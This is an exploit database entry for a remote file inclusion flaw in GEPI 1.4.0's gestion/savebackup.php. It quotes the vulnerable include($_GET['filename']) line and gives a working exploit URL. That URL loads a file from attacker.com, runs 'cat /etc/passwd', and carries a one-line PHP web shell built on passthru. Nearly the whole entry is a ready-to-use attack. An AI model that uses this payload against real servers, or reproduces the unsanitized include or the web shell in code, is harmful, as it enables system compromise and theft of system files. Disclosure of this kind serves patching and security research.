GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

2006-10-31T00:00:00
ID 1337DAY-ID-1096
Type zdt
Reporter Sumit Siddharth
Modified 2006-10-31T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability
======================================================================



Package:- gepi 1.4.0

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id



#  0day.today [2018-01-02]  #